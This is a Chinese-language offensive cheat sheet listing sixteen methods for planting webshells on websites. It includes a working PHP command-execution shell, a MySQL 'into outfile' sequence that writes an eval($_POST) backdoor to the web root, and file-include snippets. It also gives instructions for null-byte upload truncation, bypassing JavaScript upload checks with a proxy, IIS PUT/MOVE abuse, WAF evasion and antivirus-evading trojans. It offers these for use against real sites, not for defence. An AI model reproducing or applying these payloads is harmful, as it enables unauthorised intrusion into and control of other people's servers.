常用方法簡介:
一、0day拿webshell
參考工具:織夢漏洞利用小工具
二、通過注入漏洞拿Webshell
前提條件:具有足夠權限,對寫入木馬的文件夾要有寫入權限,知道網站絕對路徑。
對於mssql注入漏洞,網站可以通過log備份、差異備份拿Webshell
對於mysql注入漏洞的網站可以通過into file函數將一句話木馬寫入,拿Webshell。
參考工具:Getwebshell增強版、pangolin、
三、通過遠程命令執行拿Webshell
zhu.php
<?php $x=$_GET["z"]; echo "<pre>"; echo shell_exec($x); echo "<pre>"; ?>
然后再瀏覽器訪問此php文件,跟一個z的參數是一句話木馬,輸出到cracer.php文件
跟着在瀏覽器訪問一下這個php文件,再用菜刀連接就可以了
四、struts2拿Webshell
參考工具:鬼哥struts2、Struts2漏洞批量檢測
五、通過用戶上傳頭像拿Webshell
原理:用戶注冊后,有些網站可以上傳頭像圖片、附件、文件等,可以利用此來上傳Webshell
六、IIS寫權限拿webshell
原理:通過找到有IIS寫入權限的網站,put進去一個txt文件,目錄必須有可寫的權限,然后通過move方法進行重命名為xxx.php
參考工具:IIS put scanner
七、本地JS驗證突破拿Webshell
當網站設置了JS來限制用戶上傳的文件類型時,我們可以通過刪除JS文件或者修改上傳文件類型突破上傳限制拿Webshell
參考工具:使用burpsuit或fiddler代理工具提交,本地文件先改為XXX.jpg,上傳時攔截,再把文件名后綴更改為php即可
八、修改網站上傳類型配置拿Webshell
有的網站設置了上傳類型的限制,修改其上傳類型即可
九、文件包含拿Webshell
先將Webshell改為txt文件上傳,然后上傳一個腳本文件包含該txt文件,可繞過waf拿webshell
asp包含
1.<!--#include file="123.jpg"--> 2.調用的文件和被調用的文件必須在同一個目錄,否則找不到 3.不同目錄之間包含 <!--#include virtual="文件所在目錄/123.jpg"-->
php包含
<?php include ("123.jpg")?>;
十、網站配置插馬拿Webshell
通過找到網站默認配置,將一句話插入網站配置中間。
十一、利用編輯器漏洞拿Webshell
常見的編輯器漏洞有fckeditor、ewebeditor、cheditor等
十二、通過編輯器模板拿Webshell
通過對網站的模板進行編輯寫入一句話,然后生成腳本文件拿webshell
通過將木馬添加到壓縮文件,把名字改為網站模板類型,上傳到網站服務器拿webshell
十三、數據庫命令執行拿webshell
可以利用phpmyadmin登錄數據庫使用數據庫命令將木馬導出,拿Webshell(適用於phpmyadmin比較老的版本)
create table study (cmd text NOT NULL); insert into study(cmd) VALUES ('<?php eval ($_POST[cmd])?>'); select cmd from study into outfile 'D:/www/rooney.php'; drop TABLE IF EXISTS study;
十四、00截斷拿Webshell
在上傳文件的時候,你上傳的文件名可能會被網站自動改成別的名字,這個時候你可以嘗試抓取文件上傳數據包,將文件名改為XX.asp%00.jpg進行截斷上傳,拿webshell
十五、利用解析漏洞拿Webshell
IIS 5.X/6.0解析漏洞 IIS 7.0/IIS 7.5 /nginx < 8.03 畸形解析漏洞 nginx < 8.03 空字節代碼執行漏洞 Apache 解析漏洞
十六:另類拿Webshell
更新頁面拿 Webshell 上傳插件拿Webshell 上傳特殊馬拿Webshell 上傳免殺馬過安全軟件